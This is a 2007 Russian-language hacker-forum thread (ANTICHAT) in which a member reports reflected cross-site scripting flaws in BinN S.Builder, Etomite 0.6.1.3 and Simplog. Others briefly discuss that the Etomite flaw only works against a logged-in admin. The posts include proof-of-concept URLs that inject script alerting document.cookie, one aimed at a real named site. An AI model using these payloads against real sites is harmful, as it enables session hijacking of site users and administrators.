HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

пасивные хсс на некоторых Cms
  #1  
Старый 16.03.2007, 19:51
Robin_Hood
Участник форума
Регистрация: 30.10.2006
Сообщений: 238
С нами: 10279046

Репутация: 444
По умолчанию пасивные хсс на некоторых Cms

CMS BinN S.Builder - уязвимо поле "поиск"
пример:
Код:
http://cmsobzor.ru/searth.php?search_words=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0
etomite0613
уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом

Код:
http://localhost/etomite0613/etomite0613/manager/index.php?a=17'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://localhost/etomite0613/etomite0613/manager/
- дефолтовая админка

http://www.simplog.org - уязвимость в поиске
 

  #2  
Старый 16.03.2007, 19:55
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

Цитата:
Сообщение от Robin_Hood  
etomite0613
уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом
Я думаю когда ктонибудь получит права админа на этой системе ему уже будет похрену на эти хсс))
 

  #3  
Старый 16.03.2007, 19:56
Robin_Hood
Участник форума
Регистрация: 30.10.2006
Сообщений: 238
С нами: 10279046

Репутация: 444
По умолчанию

freddi я не так выразился) хсс подействует только на админа сайта, для обычных юзеров не покатит
 
Закрытая тема



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Reviews CMS w3r3.w01f PHP 33 12.04.2010 23:18
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
активные хсс на некоторых онлайн-дневников Robin_Hood Уязвимости 0 08.02.2007 20:03
Девять Комерческих Cms w3r3.w01f PHP 1 21.04.2006 00:27
ХСС под Оперу, Ff. FHT Разное - Покупка, продажа, обмен 0 07.03.2006 21:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.